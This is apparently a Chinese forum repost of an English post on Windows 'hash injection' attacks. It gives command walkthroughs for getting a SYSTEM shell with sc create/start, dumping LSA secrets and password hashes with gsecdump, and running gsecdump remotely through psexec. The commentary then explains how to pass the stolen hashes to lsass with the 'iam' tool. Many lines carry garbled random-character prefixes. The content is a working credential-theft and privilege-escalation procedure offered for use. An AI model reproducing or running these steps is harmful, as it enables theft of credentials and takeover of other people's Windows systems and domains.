HASH注入式攻击

admin

o get a DOS Prompt as NT system:

0 H4 e. R1 g/ b# eC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

1 r) u/ b2 G1 _  [7 c7 QC:\>sc start shellcmdline
[SC] StartService FAILED 1053:

: j2 l5 M; i, bThe service did not respond to the start or control request in a timely fashion.
& L7 S5 ?% r+ O% c9 e+ j
6 c1 z. U- q( }6 yC:\>sc delete shellcmdline
$ E* R" }$ G, G; O  q6 t[SC] DeleteService SUCCESS
  @7 f3 F: n& m$ F. F! |" _
- x& S8 ], ^. o& d------------

& E1 F: _8 g* l/ H, L" LThen in the new DOS window:

$ {  B- Q( Q+ [7 I2 s$ jMicrosoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
! V, S! ]# \: T2 R: X7 Y& e# v, lNT AUTHORITY\SYSTEM
/ K/ y$ _# Y2 \4 D, T1 d
+ ~0 [. ^9 \' g5 H$ Z/ p- fC:\WINDOWS\system32>gsecdump -h
- S, W  O2 Y+ k( R+ C# qgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
usage: gsecdump [options]
' m- q* \6 r- H5 R- \
& m, Z- E7 o; ^* Ooptions:
5 [1 n/ ]' Y( I# u8 [# o-h [ --help ] show help
/ @/ C( u8 ]+ a7 o; S8 A-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
) P; ^0 m$ P2 S: e-w [ --dump_wireless ] dump microsoft wireless connections
- W1 w, m, z& Y& {-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
1 F" H+ u) N  c6 p
$ N: l! h( Z/ W2 H9 JPsExec v1.83 - Execute processes remotely
" `) O4 R( m$ gCopyright (C) 2001-2007 Mark Russinovich
Sysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

8 U7 M, A4 b5 n+ v# fto get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

' a: t. [7 d/ m提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
9 a3 B0 |9 ~4 A" N6 \  @